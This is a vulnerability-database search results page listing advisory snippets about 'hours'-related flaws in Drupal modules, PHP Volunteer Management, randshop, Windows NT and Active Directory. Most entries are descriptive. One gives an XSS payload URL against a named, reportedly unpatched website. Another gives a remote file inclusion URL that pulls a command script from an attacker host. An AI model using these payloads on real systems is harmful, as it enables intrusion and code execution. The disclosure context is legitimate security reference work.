Lucene search
+L

198 matches found

CNVD
CNVD
added 2017/03/27 12:0 a.m.2 views

Drupal Office Hours Module Cross-Site Scripting Vulnerability

Drupal is a free, open-source content management system developed in PHP and maintained by the Drupal community.Office Hours is one of the modules that defines the "Weekly Office Hours" field type. A cross-site scripting vulnerability exists in the Drupal Office Hours module, which is caused by a...

6.3AI score
Exploits0References1
Drupal
Drupal
added 2017/03/22 12:0 a.m.13 views

Office Hours - Moderately Critical - Cross Site Scripting - DRUPAL-SA-CONTRIB-2017-032

This module enables you to show the office hours of a location to the public. The module doesn't sufficiently filter user input for malicious Cross Site Scripting xss. This vulnerability is mitigated by the fact that an attacker must have a role with a permission to add fields to an entity. CVE...

6.6AI score
Exploits0References12
CNVD
CNVD
added 2016/07/20 12:0 a.m.3 views

Drupal Opening Hours Module Cross-Site Scripting Vulnerability

Drupal is a free, open-source content management system developed in PHP and maintained by the Drupal community. opening hours is one of the modules used to find stores or libraries that are open at a certain time. A cross-site scripting vulnerability exists in the Drupal Opening Hours module in...

7AI score
Exploits0References1
Drupal
Drupal
added 2016/06/01 12:0 a.m.17 views

Opening hours - Moderately Critical - XSS - SA-CONTRIB-2016-031

This module enables you to enter opening hours for locations in a highly detailed way. The module doesn't sufficiently escape input data from user input. This vulnerability is mitigated by the fact that an attacker must be able to edit opening hours by having a role with the permission “Edit...

7AI score
Exploits0References11
Openbugbounty
Openbugbounty
added 2016/05/26 1:25 p.m.10 views

lunarium.co.uk XSS vulnerability

Vulnerable URL: http://www.lunarium.co.uk/planets/hours.jsp?location=1%22--%3E%3Csvg/onload=;prompt%28/OPENBUGBOUNTY/%29;%3E=44.50=20.30=Europe/Belgrade=UK=degMin Details: Description| Value ---|--- Patched:| No Latest check for patch:| 27.07.2017 Vulnerability type:| XSS Vulnerability status:|...

6.3AI score
Exploits0
The Hacker News
The Hacker News
added 2015/01/20 11:46 a.m.20 views

Whatsapp Banned Users For Using WhatsApp PLUS App

Are you one of those victims whose WhatsApp app has recently been banned?? Then you must have installed a 3rd-party version of WhatsApp client, like WhatsAppMD or Whatsapp PLUS in your mobile phone for sure. Reportedly after 12 AM IST on 21st January 2015, WhatsApp, the widely popular messaging...

6.7AI score
Exploits0
The Hacker News
The Hacker News
added 2013/11/14 5:21 p.m.7 views

DDoS attack from Browser-based Botnets that lasted for 150 hours

Browser-based botnets are the T-1000s of the DDoS world. Just like the iconic villain of the old Judgment Day movie, they too are designed for adaptive infiltration. This is what makes them so dangerous. Where other more primitive bots would try to brute-force your defenses, these bots can simply...

6.9AI score
Exploits0
Prion
Prion
added 2013/01/24 1:55 a.m.14 views

Sql injection

SQL injection vulnerability in mods/hours/data/gethours.php in PHP Volunteer Management 1.0.2 allows remote attackers to execute arbitrary SQL commands via the id parameter...

7.5CVSS9.2AI score0.01119EPSS
Exploits1References5Affected Software1
CVE
CVE
added 2013/01/24 1:0 a.m.46 views

CVE-2012-6505

CVE-2012-6505 is an XSS vulnerability in PHP Volunteer Management 1.0.2, specifically in mods/hours/data/get_hours.php where the id parameter can be abused to inject arbitrary script/HTML. Affected component is the get_hours.php routine; root cause is improper handling/validation of the id input....

4.3CVSS6AI score0.03236EPSS
Exploits1References5Affected Software1
securityvulns
securityvulns
added 2012/06/18 12:0 a.m.32 views

Squirrelcart Cart Shop v3.3.4 - Multiple Web Vulnerabilities

Title: ====== Squirrelcart Cart Shop v3.3.4 - Multiple Web Vulnerabilities Date: ===== 2012-06-04 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=592 VL-ID: ===== 592 Common Vulnerability Scoring System: ==================================== 3.5 Introduction: ===========...

0.2AI score
Exploits0
seebug.org
seebug.org
added 2012/05/04 12:0 a.m.17 views

PHP Volunteer Management 1.0.x<=1.0.2 /mods/hours/data/get-hours.php sql注入

No description provided by source...

7.1AI score
Exploits0
securityvulns
securityvulns
added 2007/06/01 12:0 a.m.26 views

Microsoft Windows Active Directory users account enumeration

It's possible to enumerate accounts with Logon Hours limitation set...

3.7AI score
Exploits0References1
securityvulns
securityvulns
added 2007/06/01 12:0 a.m.39 views

[Full-disclosure] Microsoft Windows Active Directory Logon Hours User Enumeration Weakness

Windows Server 2003 can be configured http://support.microsoft.com/kb/816666 to restrict the hours and days that a user may log on to a Windows Server 2003 domain. This could lead to username enumeration. Issue:- Microsoft Windows Active Directory Username Enumeration Criticality:- Less Critical...

6.9AI score
Exploits0
securityvulns
securityvulns
added 2006/07/11 12:0 a.m.59 views

randshop &lt;= 1.1.x &#40;index.php&#41; Remote File Inclusion Vulnerability

Title : randshop = 1.1.x Remote File Inclusion Vulnerability - URL : http://www.randshop.com/ - Author :Saudi Hackrz - contact : Saudi.UnixatHotmail.com - dork : "software 2004-2005 by randshop" - exploit : http://target/path/index.php?dateiPfad=http://attacker/cmd.txt?&cmd=ls - greatz : SnIpEr.S...

1.7AI score
Exploits0
CVE
CVE
added 2000/02/04 5:0 a.m.36 views

CVE-1999-0597

CVE-1999-0597 concerns a Windows NT account policy where remote users are not forcibly disconnected when logon hours expire. Several sources (NVD, Red Hat, CVE list, Red Team/PT security pages) confirm the issue is tied to the Windows NT account policy and its handling of remote logins; no detail...

10CVSS7.1AI score0.03129EPSS
Exploits0References1
Cvelist
Cvelist
added 2000/02/04 5:0 a.m.17 views

CVE-1999-0597

A Windows NT account policy does not forcibly disconnect remote users from the server when their logon hours expire...

6.7AI score0.03129EPSS
Exploits0References1
NVD
NVD
added 1999/01/01 5:0 a.m.11 views

CVE-1999-0597

A Windows NT account policy does not forcibly disconnect remote users from the server when their logon hours expire...

10CVSS6.7AI score0.03129EPSS
Exploits0References1
Positive Technologies
Positive Technologies
added 1999/01/01 12:0 a.m.4 views

PT-1999-1215 · Microsoft · Windows Nt

Name of the Vulnerable Software and Affected Versions: Windows NT affected versions not specified Description: A Windows NT account policy issue allows remote users to remain connected to the server even after their logon hours have expired, as the policy does not forcibly disconnect them...

10CVSS6.3AI score0.03129EPSS
Exploits0References2
Rows per page
Query Builder